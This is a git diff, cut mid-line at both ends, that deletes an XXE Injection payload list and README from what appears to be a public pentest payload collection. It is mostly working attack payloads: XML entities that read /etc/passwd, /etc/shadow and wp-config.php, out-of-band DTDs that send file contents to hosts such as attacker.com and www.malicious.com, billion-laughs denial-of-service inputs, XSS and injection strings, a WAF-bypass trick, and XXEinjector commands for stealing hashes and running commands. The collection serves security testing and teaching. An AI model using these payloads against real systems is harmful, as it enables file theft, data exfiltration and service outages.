dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> -<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> diff --git a/XXE Injection/Intruders/xml-attacks.txt b/XXE Injection/Intruders/xml-attacks.txt deleted file mode 100644 index e7269bd..0000000 --- a/XXE Injection/Intruders/xml-attacks.txt +++ /dev/null @@ -1,68 +0,0 @@ -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> -<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]> -<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]> -<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]> -<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall> -<?xml version="1.0"?><change-log><text>Hello World</text></change-log> -<?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log> -<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log> -<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log> -<!ENTITY systemEntity SYSTEM "robots.txt"> -<change-log> <text>&systemEntity;</text> </change-log> -<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log> -<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log> -<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log> -<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test> -<?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-log> -count(/child::node()) -x' or name()='username' or 'x'='y -<name>','')); phpinfo(); exit;/*</name> -<![CDATA[<script>var n=0;while(true){n++;}</script>]]> -<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> -<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> -<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo> -<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" -<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" -<xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" -<HTML xmlns:xss><?import namespace="xss" implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></HTML> -<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> -<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]> -‘ -“ -<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log> -<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini" >]><doc><test>Contents of file: &xxe;</test></doc> -<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> -<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo> -"}}</script><script>alert(1);</script></body></html><!-- -}}</script>'" -}}</script>' -'}}</script>' -'}}</script>" -<?xml version="1.0" encoding="utf-16" standalone="yes"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://wordpress.org/</string></value></param><param><value><string>http://xerosecurity.com</string></value></param></params></methodCall> -<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "../../../../../../../etc/passwd">]><methodCall><methodName>&xxe</methodName></methodCall> -<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall> -<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> -<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> -<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents of file: &xxe;</test></doc> -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo> - <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt">]><foo>&xxe;</foo> -}}</script><script>alert(1);</script></body></html><!-- -"}}</script>' -}}</script>""'" -<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg> -<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg> -<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> -<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> - diff --git a/XXE Injection/README.md b/XXE Injection/README.md deleted file mode 100644 index 89bded8..0000000 --- a/XXE Injection/README.md +++ /dev/null @@ -1,696 +0,0 @@ -# XML External Entity - -> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server. - -**Internal Entity**: If an entity is declared within a DTD it is called as internal entity. -Syntax: `<!ENTITY entity_name "entity_value">` - -**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`. -Syntax: `<!ENTITY entity_name SYSTEM "entity_value">` - -## Summary - -- [Tools](#tools) -- [Labs](#labs) -- [Detect the vulnerability](#detect-the-vulnerability) -- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files) - - [Classic XXE](#classic-xxe) - - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded) - - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) - - [XInclude attacks](#xinclude-attacks) -- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) -- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) - - [Billion Laugh Attack](#billion-laugh-attack) - - [Yaml attack](#yaml-attack) - - [Parameters Laugh attack](#parameters-laugh-attack) -- [Exploiting Error Based XXE](#exploiting-error-based-xxe) -- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - - [Blind XXE](#blind-xxe) - - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) - - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) -- [WAF Bypasses](#waf-bypasses) - - [Bypass via character encoding](#bypass-via-character-encoding) -- [XXE in Java](#xxe-in-java) -- [XXE in exotic files](#xxe-in-exotic-files) - - [XXE inside SVG](#xxe-inside-svg) - - [XXE inside SOAP](#xxe-inside-soap) - - [XXE inside DOCX file](#xxe-inside-docx-file) - - [XXE inside XLSX file](#xxe-inside-xlsx-file) - - [XXE inside DTD file](#xxe-inside-dtd-file) -- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - -## Tools - -- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads - ``` - sudo ./xxeftp -uno 443 - ./xxeftp -w -wps 5555 - ``` -- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) - ``` - $ python3 230.py 2121 - ``` -- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods - ```bash - # Enumerating /etc directory in HTTPS application: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl - # Enumerating /etc directory using gopher for OOB method: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher - # Second order exploitation: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt - # Bruteforcing files using HTTP out of band method and netdoc protocol: - ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc - # Enumerating using direct exploitation: - ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK - # Enumerating unfiltered ports: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all - # Stealing Windows hashes: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes - # Uploading files using Java jar: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf - # Executing system commands using PHP expect: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls - # Testing for XSLT injection: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt - # Log requests only: - ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt - ``` -- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) - ``` - ruby server.rb - ``` -- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc - ``` - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx - ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place - ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx - ``` -- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. - ``` - python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs - ``` - -## Labs - -* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection) - * [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files) - * [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf) - * [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction) - * [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities) - * [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration) - * [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) - * [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack) - * [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload) - * [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd) - - -## Detect the vulnerability - -Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element. - -```xml -<!--?xml version="1.0" ?--> -<!DOCTYPE replace [<!ENTITY example "Doe"> ]> - <userInfo> - <firstName>John</firstName> - <lastName>&example;</lastName> - </userInfo> -``` - -It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. - -## Exploiting XXE to retrieve files - -### Classic XXE - -We try to display the content of the file `/etc/passwd` - -```xml -<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root> -``` - -```xml -<?xml version="1.0"?> -<!DOCTYPE data [ -<!ELEMENT data (#ANY)> -<!ENTITY file SYSTEM "file:///etc/passwd"> -]> -<data>&file;</data> -``` - -```xml -<?xml version="1.0" encoding="ISO-8859-1"?> - <!DOCTYPE foo [ - <!ELEMENT foo ANY > - <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> -``` - -```xml -<?xml version="1.0" encoding="ISO-8859-1"?> -<!DOCTYPE foo [ - <!ELEMENT foo ANY > - <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> -``` - -:warning: `SYSTEM` and `PUBLIC` are almost synonym. - -```ps1 -<!ENTITY % xxe PUBLIC "Random Text" "URL"> -<!ENTITY xxe PUBLIC "Any TEXT" "URL"> -``` - -### Classic XXE Base64 encoded - -```xml -<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/> -``` - -### PHP Wrapper inside XXE - -```xml -<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> -<contacts> - <contact> - <name>Jean &xxe; Dupont</name> - <phone>00 11 22 33 44</phone> - <address>42 rue du CTF</address> - <zipcode>75000</zipcode> - <city>Paris</city> - </contact> -</contacts> -``` - -```xml -<?xml version="1.0" encoding="ISO-8859-1"?> -<!DOCTYPE foo [ -<!ELEMENT foo ANY > -<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" > -]> -<foo>&xxe;</foo> -``` - -### XInclude attacks - -When you can't modify the **DOCTYPE** element use the **XInclude** to target - -```xml -<foo xmlns:xi="http://www.w3.org/2001/XInclude"> -<xi:include parse="text" href="file:///etc/passwd"/></foo> -``` - - - -## Exploiting XXE to perform SSRF attacks - -XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. - -```xml -<?xml version="1.0" encoding="ISO-8859-1"?> -<!DOCTYPE foo [ -<!ELEMENT foo ANY > -<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" > -]> -<foo>&xxe;</foo> -``` - - -## Exploiting XXE to perform a deny of service - -:warning: : These attacks might kill the service or the server, do not use them on the production. - -### Billion Laugh Attack - -```xml -<!DOCTYPE data [ -<!ENTITY a0 "dos" > -<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> -<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> -<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> -<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> -]> -<data>&a4;</data> -``` - -### Yaml attack - -```xml -a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] -b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] -c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] -d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] -e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] -f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] -g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] -h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] -i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] -``` - -### Parameters Laugh attack - -A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. - -```xml -<!DOCTYPE r [ - <!ENTITY % pe_1 "<!---->"> - <!ENTITY % pe_2 "&#37;pe_1;<!---->&#37;pe_1;"> - <!ENTITY % pe_3 "&#37;pe_2;<!---->&#37;pe_2;"> - <!ENTITY % pe_4 "&#37;pe_3;<!---->&#37;pe_3;"> - %pe_4; -]> -<r/> -``` - -## Exploiting Error Based XXE - -**Payload to trigger the XXE** - -```xml -<?xml version="1.0" ?> -<!DOCTYPE message [ - <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> - %ext; -]> -<message></message> -``` - -**Contents of ext.dtd** - -```xml -<!ENTITY % file SYSTEM "file:///etc/passwd"> -<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> -%eval; -%error; -``` - -## Exploiting blind XXE to exfiltrate data out-of-band - -Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. - -### Basic Blind XXE - -The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator. - -```xml -<?xml version="1.0" ?> -<!DOCTYPE root [ -<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext; -]> -<r></r> -``` - -Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line. - -```xml -<?xml version="1.0" encoding="ISO-8859-1"?> -<!DOCTYPE foo [ -<!ELEMENT foo ANY > -<!ENTITY % xxe SYSTEM "file:///etc/passwd" > -<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;"> -] -> -<foo>&callhome;</foo> -``` - -### XXE OOB Attack (Yunusov, 2013) - -```xml -<?xml version="1.0" encoding="utf-8"?> -<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"> -<data>&send;</data> - -File stored on http://publicServer.com/parameterEntity_oob.dtd -<!ENTITY % file SYSTEM "file:///sys/power/image_size"> -<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"> -%all; -``` - -### XXE OOB with DTD and PHP filter - -```xml -<?xml version="1.0" ?> -<!DOCTYPE r [ -<!ELEMENT r ANY > -<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> -%sp; -%param1; -]> -<r>&exfil;</r> - -File stored on http://127.0.0.1/dtd.xml -<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> -<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> -``` - -### XXE OOB with Apache Karaf - -CVE-2018-11788 affecting versions: - -- Apache Karaf <= 4.2.1 -- Apache Karaf <= 4.1.6 - -```xml -<?xml version="1.0" encoding="UTF-8"?> -<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;] -<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" - xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0"> - <feature name="deployer" version="2.0" install="auto"> - </feature> -</features> -``` - -Send the XML file to the `deploy` folder. - -Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) - - -## XXE with local DTD - -In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: -```xml -<!DOCTYPE root [<!ENTITY test SYSTEM 'http://h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net'>]> -<root>&test;</root> -``` - -If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename. - -```xml -<!DOCTYPE root [ - <!ENTITY % local_dtd SYSTEM "file:///abcxyz/"> - - %local_dtd; -]> -<root></root> -``` - -Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message. - -```xml -<!DOCTYPE root [ - <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> - - <!ENTITY % ISOamsa ' - <!ENTITY &#x25; file SYSTEM "file:///REPLACE_WITH_FILENAME_TO_READ"> - <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> - &#x25;eval; - &#x25;error; - '> - - %local_dtd; -]> -<root></root> -``` -### Cisco WebEx -``` -<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> -<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'> -%local_dtd; -``` -### Citrix XenMobile Server -``` -<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"> -<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'> -%local_dtd; -``` -[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - - -## WAF Bypasses - -### Bypass via character encoding - -XML parsers uses 4 methods to detect encoding: -* HTTP Content Type: `Content-Type: text/xml; charset=utf-8` -* Reading Byte Order Mark (BOM) -* Reading first symbols of document - * UTF-8 (3C 3F 78 6D) - * UTF-16BE (00 3C 00 3F) - * UTF-16LE (3C 00 3F 00) -* XML declaration: `<?xml version="1.0" encoding="UTF-8"?>` - -| Encoding | BOM | Example | | -|----------|----------|-------------------------------------|--------------| -| UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml | -| UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l | -| UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. | - -**Example**: We can convert the payload to `UTF-16` using [iconv](https://man7.org/linux/man-pages/man1/iconv.1.html) to bypass some WAF: - -```bash -cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml -``` - -## XXE in Java - -Unsecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE: - -![XXE Java security features overview infographics](https://semgrep.dev/docs/assets/images/cheat-sheets-xxe-java-infographics-1d1d5016802e3ab8f0886b62b8c81f21.png) - -- [DocumentBuilderFactory (javax.xml.parsers.DocumentBuilderFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3a-documentbuilderfactory) -- [SAXBuilder (org.jdom2.input.SAXBuilder)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3b-saxbuilder) -- [SAXParserFactory (javax.xml.parsers.SAXParserFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3c-saxparserfactory) -- [SAXParser (javax.xml.parsers.SAXParser )](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3d-saxparser) -- [SAXReader (org.dom4j.io.SAXReader)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3e-saxreader) -- [TransformerFactory (javax.xml.transform.TransformerFactory) & SAXTransformerFactory (javax.xml.transform.sax.SAXTransformerFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3f-transformerfactory--saxtransformerfactory) -- [SchemaFactory (javax.xml.validation.SchemaFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3g-schemafactory) -- [Validator (javax.xml.validation.Validator)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3h-validator) -- [XMLReader (org.xml.sax.XMLReader)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3i-xmlreader) - -Ref. - -- [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java) -- [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/) - -## XXE in exotic files - -### XXE inside SVG - -```xml -<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> - <image xlink:href="expect://ls" width="200" height="200"></image> -</svg> -``` - -**Classic** - -```xml -<?xml version="1.0" standalone="yes"?> -<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> -<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> - <text font-size="16" x="0" y="16">&xxe;</text> -</svg> -``` - -**OOB via SVG rasterization** - -*xxe.svg* - -```xml -<?xml version="1.0" standalone="yes"?> -<!DOCTYPE svg [ -<!ELEMENT svg ANY > -<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml"> -%sp; -%param1; -]> -<svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red"> - <text x="15" y="100" style="fill:black">XXE via SVG rasterization</text> - <rect x="0" y="0" rx="10" ry="10" width="200" height="200" 